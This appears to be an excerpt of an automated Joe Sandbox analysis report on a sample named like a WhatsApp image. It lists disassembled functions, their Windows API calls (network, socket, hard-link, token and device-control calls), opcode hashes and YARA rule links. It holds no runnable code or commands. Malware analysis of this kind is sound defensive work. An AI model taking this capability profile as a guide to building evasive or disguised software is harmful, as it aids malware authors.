Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 86042d08af0a009ff2bbf6ddbbb6425120fc664768cf68ec67fd6e06ccbfffb6
Instruction ID: cb6ae16aeb1df17c708b8740525600aab8e885a24fd99c6c84ee764bd0e3ea59
Opcode Fuzzy Hash: 86042d08af0a009ff2bbf6ddbbb6425120fc664768cf68ec67fd6e06ccbfffb6
Instruction Fuzzy Hash: 9A517C75900644EFDF20DF69C880EAE7BB6FB45320F108259F865AB290D771ED82CB90

Function 000BC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 000BC462
__itow.LIBCMT ref: 000BC49C

Part of subcall function 000BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 000BC753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 000BC505
__itow.LIBCMT ref: 000BC55A

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 23f90e9c18ce2cbb34c222a0f08f8d707ac76d164bc5a09ba415ad4c8867f9a0
Instruction ID: 6401ae8ee1ec719cc19067ef1260392491f48ebfac84932f7885b2fdfc8bd894
Opcode Fuzzy Hash: 23f90e9c18ce2cbb34c222a0f08f8d707ac76d164bc5a09ba415ad4c8867f9a0
Instruction Fuzzy Hash: E441A771A00609AFEF21EF54CC55FEE7BB5AF49700F000069F945A7282DB709A85CBA1

Function 000CE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000CE742
GetLastError.KERNEL32(?,00000000), ref: 000CE768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000CE78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000CE7B9

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 9bbbfdbfb8dc79736d11ee37ca867f46e023b88871d6ffd31711e124d74d9d76
Instruction ID: 3e686ec2d27643a55b514fa798354ad7eb644b4c845564d1a99ed7f0d9f48e6f
Opcode Fuzzy Hash: 9bbbfdbfb8dc79736d11ee37ca867f46e023b88871d6ffd31711e124d74d9d76
Instruction Fuzzy Hash: 87413839200650EFCF11FF14C845A9DBBE5BF59720B098099E986AB3A2CB70FD40DB91

Function 000EB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000EB5D1

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 91b3ee0d99e9b37c5caf8c1c200df00f1ec3428efe54df6f28af1184ebd84d83
Instruction ID: d2534220d1c3bc4bb4e95485c68a3bee75237f4748002bdf090d3a7312fc557b
Opcode Fuzzy Hash: 91b3ee0d99e9b37c5caf8c1c200df00f1ec3428efe54df6f28af1184ebd84d83
Instruction Fuzzy Hash: 6231ED75601684BFEF309F5ACC89FAE77A5AB06310F504502FA51F61E1CB74A9808B51

Function 000ED7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 000ED807
GetWindowRect.USER32(?,?), ref: 000ED87D
PtInRect.USER32(?,?,000EED5A), ref: 000ED88D
MessageBeep.USER32(00000000), ref: 000ED8FE

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b378f869d588de80619d7999f8c7459fc4e1e19103cb6b8bd7cd2d31fd5cf164
Instruction ID: ecce8c7e62e06efbb950037efee004b193f70f546adb9b60c6d683d8fafdc2c6
Opcode Fuzzy Hash: b378f869d588de80619d7999f8c7459fc4e1e19103cb6b8bd7cd2d31fd5cf164
Instruction Fuzzy Hash: 4241E374A00288EFCB11CF5AD980BADB7F5FF45310F1981A6E814EB261DB30E881CB50

Function 000B4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000B4038
__isleadbyte_l.LIBCMT ref: 000B4066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000B4094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000B40CA

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 4d0e8951c6a7a6d5a4109be071db1d3782ee144a3e2358555ab2beff9c537dac
Instruction ID: f1ab19c4a076a8d5d81cfccfa795a7f11204d451af3594b0177e8b0bbec7a610
Opcode Fuzzy Hash: 4d0e8951c6a7a6d5a4109be071db1d3782ee144a3e2358555ab2beff9c537dac
Instruction Fuzzy Hash: 0C31C131610216EFDB21AF74C848BFA7BF5FF41310F158428EA658B1A2E771DA91DB90

Function 000E7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 000E7CB9

Part of subcall function 000C5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 000C5F6F
Part of subcall function 000C5F55: GetCurrentThreadId.KERNEL32 ref: 000C5F76
Part of subcall function 000C5F55: AttachThreadInput.USER32(00000000,?,000C781F), ref: 000C5F7D

GetCaretPos.USER32(?), ref: 000E7CCA
ClientToScreen.USER32(00000000,?), ref: 000E7D03
GetForegroundWindow.USER32 ref: 000E7D09

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: bc4352af8ac0e212adc5ce11bbe80fe25c71b6d530c0d567a99a848e6985f7d0
Instruction ID: f080ab0958c9ecea836c583bcf55bc51fd2aa6d48a802d8dd4667cefa19c68ff
Opcode Fuzzy Hash: bc4352af8ac0e212adc5ce11bbe80fe25c71b6d530c0d567a99a848e6985f7d0
Instruction Fuzzy Hash: 84311E76D00108AFDB11EFA9DC459EFBBF9EF54314B10846AF815E3212DA319E45DBA0

Function 000EF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

GetCursorPos.USER32(?), ref: 000EF211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000FE4C0,?,?,?,?,?), ref: 000EF226
GetCursorPos.USER32(?), ref: 000EF270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000FE4C0,?,?,?), ref: 000EF2A6

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: eebcb59849d7be944ac3a199605b3ded504ba50af58c3ea13bf34385190311bd
Instruction ID: 0e48997527d9a1af9b34616a0ccee627dc4fecdf1d9d497bbe3b7a85d0f61cb3
Opcode Fuzzy Hash: eebcb59849d7be944ac3a199605b3ded504ba50af58c3ea13bf34385190311bd
Instruction Fuzzy Hash: 3321B139600018BFCB258F95DC58EFE7BB5EF4A310F048069FA05572A1D3B09D90DB50

Function 000D431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000D4358

Part of subcall function 000D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000D4401
Part of subcall function 000D43E2: InternetCloseHandle.WININET(00000000), ref: 000D449E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: aaaa712167c989342fa1f42548ef10cad039d02311d2a2177133e4849701bc6f
Instruction ID: 77fa48a08e68464b20123dd23f5bf817921cbb157f41db8135dcc4937ccfc3d6
Opcode Fuzzy Hash: aaaa712167c989342fa1f42548ef10cad039d02311d2a2177133e4849701bc6f
Instruction Fuzzy Hash: 9B21D131200701BBEB219FA49C01FBBBBE9FF48714F04401BFA5596750DBB199219BB0

Function 000E8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 000E8AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 000E8AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 000E8ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 000E8ADC

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 8a1876c10b144bee780c511cc4a1a840579008ca000646f9d6d99f9431f1a75a
Instruction ID: 3934eeb21547d22e935c44a37ebf2d84c31cfc5dda4ab11efe1d325d864a5472
Opcode Fuzzy Hash: 8a1876c10b144bee780c511cc4a1a840579008ca000646f9d6d99f9431f1a75a
Instruction Fuzzy Hash: 5A119331205111AFE714AB59DC09FBE7799BF85320F18812AF96AD72E2CFB0AC418795

Function 000D8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 000D8AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 000D8AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 000D8AFF
WSAGetLastError.WSOCK32(00000000), ref: 000D8B16

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 00f59ce342a73b5093fb57ac478cbf1fe55f2469a02f0b106f8650388253fa1a
Instruction ID: 622d9d6956f61fd4d330ca74c40866e01e68928bdb1aa1b2aebcd2623ac7e7a4
Opcode Fuzzy Hash: 00f59ce342a73b5093fb57ac478cbf1fe55f2469a02f0b106f8650388253fa1a
Instruction Fuzzy Hash: F9216672A001249FC7119F69D895ADE7BFCEF49364F00816AF849D7291DB74D9818FA0

Function 000C0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,000C0ABB,?,?,?,000C187A,00000000,000000EF,00000119,?,?), ref: 000C1E77
Part of subcall function 000C1E68: lstrcpyW.KERNEL32(00000000,?,?,000C0ABB,?,?,?,000C187A,00000000,000000EF,00000119,?,?,00000000), ref: 000C1E9D
Part of subcall function 000C1E68: lstrcmpiW.KERNEL32(00000000,?,000C0ABB,?,?,?,000C187A,00000000,000000EF,00000119,?,?), ref: 000C1ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,000C187A,00000000,000000EF,00000119,?,?,00000000), ref: 000C0AD4
lstrcpyW.KERNEL32(00000000,?,?,000C187A,00000000,000000EF,00000119,?,?,00000000), ref: 000C0AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,000C187A,00000000,000000EF,00000119,?,?,00000000), ref: 000C0B2E

Strings

cdecl, xrefs: 000C0B25

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: d67e927aa1398f267388b6141687771f4018400cc6680bfc6ec6960ece746581
Instruction ID: 1e785d026b8cf406455594b06e2c40840d1060dbd9a52d4056115607a81c8950
Opcode Fuzzy Hash: d67e927aa1398f267388b6141687771f4018400cc6680bfc6ec6960ece746581
Instruction Fuzzy Hash: 1F118E36200305EFDB25AF64DC45EBE77E8FF49354B80406AF906CB2A1EB719850D7A1

Function 000B2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 000B2FB5

Part of subcall function 000A395C: __FF_MSGBANNER.LIBCMT ref: 000A3973
Part of subcall function 000A395C: __NMSG_WRITE.LIBCMT ref: 000A397A
Part of subcall function 000A395C: RtlAllocateHeap.NTDLL(00F10000,00000000,00000001,00000001,00000000,?,?,0009F507,?,0000000E), ref: 000A399F

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 15d2bc74567129d1a411bcb0cde56028908ed15de2f125d1e580a10f91346e47
Instruction ID: ff2ee9eba85c1b56483c0325e1ae6dd6b52721f09e16efc6d1492276cd76537b
Opcode Fuzzy Hash: 15d2bc74567129d1a411bcb0cde56028908ed15de2f125d1e580a10f91346e47
Instruction Fuzzy Hash: D011C632509216ABDB363BF4FC157EA3BE4AF09370F308539F94D9A152DB74C9809A90

Function 0009EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0009EBB2

Part of subcall function 000851AF: _memset.LIBCMT ref: 0008522F
Part of subcall function 000851AF: _wcscpy.LIBCMT ref: 00085283
Part of subcall function 000851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00085293

KillTimer.USER32(?,00000001,?,?), ref: 0009EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0009EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000F3C88

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 5e03ba5de28b753cea2009e5d71e54589da6ace6c3fbaef20f9266e075cb38cf
Instruction ID: cc493ba90c0ff38a4b28fd6a0e5260ea2f2c6c74fb416da14a8dca541208e790
Opcode Fuzzy Hash: 5e03ba5de28b753cea2009e5d71e54589da6ace6c3fbaef20f9266e075cb38cf
Instruction Fuzzy Hash: F121F570504784AFEB72DB28C859BEBBBEC9B01318F04008DE3DA57242C3B06A859B51

Function 000C058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 000C05AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 000C05C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000C05DD
FreeLibrary.KERNEL32(?), ref: 000C0632

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: af22a3388adef6f0c77328b917bde2629f98b402e75ac73441f382539f4526be
Instruction ID: 6b34434a556fc9cf7a65462224bd39192c8bc45848c583a316d04b023395c14f
Opcode Fuzzy Hash: af22a3388adef6f0c77328b917bde2629f98b402e75ac73441f382539f4526be
Instruction Fuzzy Hash: C7216771900209EBDB20CF91EC88FDEBBB8EF40700F00846EE556A6450DBB0EA55DF60

Function 000C6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 000C6733
_memset.LIBCMT ref: 000C6754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 000C67A6
CloseHandle.KERNEL32(00000000), ref: 000C67AF

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 01a4be2b58a354225dd47af4569ec5760600e1e02fcda564f846d573376c2dfb
Instruction ID: 018f8074e3924b6ba1fb5163c439cafd89242d2ddad3329375d1173524c3b99d
Opcode Fuzzy Hash: 01a4be2b58a354225dd47af4569ec5760600e1e02fcda564f846d573376c2dfb
Instruction Fuzzy Hash: D7110A729012287AE73057A5AC4DFEFBABCEF44724F10469AF504E71C0D6744E808B64

Function 000BB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000BAA79
Part of subcall function 000BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000BAA83
Part of subcall function 000BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000BAA92
Part of subcall function 000BAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000BAA99
Part of subcall function 000BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000BAAAF

GetLengthSid.ADVAPI32(?,00000000,000BADE4,?,?), ref: 000BB21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 000BB227
HeapAlloc.KERNEL32(00000000), ref: 000BB22E
CopySid.ADVAPI32(?,00000000,?), ref: 000BB247

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 8346d88b7dba1e87ac56b0662b5c953c7ce33a8a21650698e888bfb2f7ebc966
Instruction ID: c068b037d1d2560ba95da2ac26919ae85f9dc2f6eda284f12e081eacde8a738a
Opcode Fuzzy Hash: 8346d88b7dba1e87ac56b0662b5c953c7ce33a8a21650698e888bfb2f7ebc966
Instruction Fuzzy Hash: DA119E71A00205EFDB149F98DC85AEEB7E9EF95304F14802DE98297211D7B1AE84CB20

Function 000BB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 000BB498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BB4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BB4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BB4DB

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
